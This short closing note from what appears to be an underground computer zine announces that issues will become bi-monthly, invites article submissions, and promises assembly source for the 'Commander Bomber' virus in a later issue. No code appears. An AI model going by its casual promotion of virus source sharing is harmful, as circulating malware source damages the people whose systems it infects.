Well that's it for this time, the mag in future will be a Bi-Monthly
affair and I now offer out to you all to send in any article for inclusion
in future issues.
Well I'm not sure what will be in next month but we should have the
Asm source for Commander Bomber Virus and much more.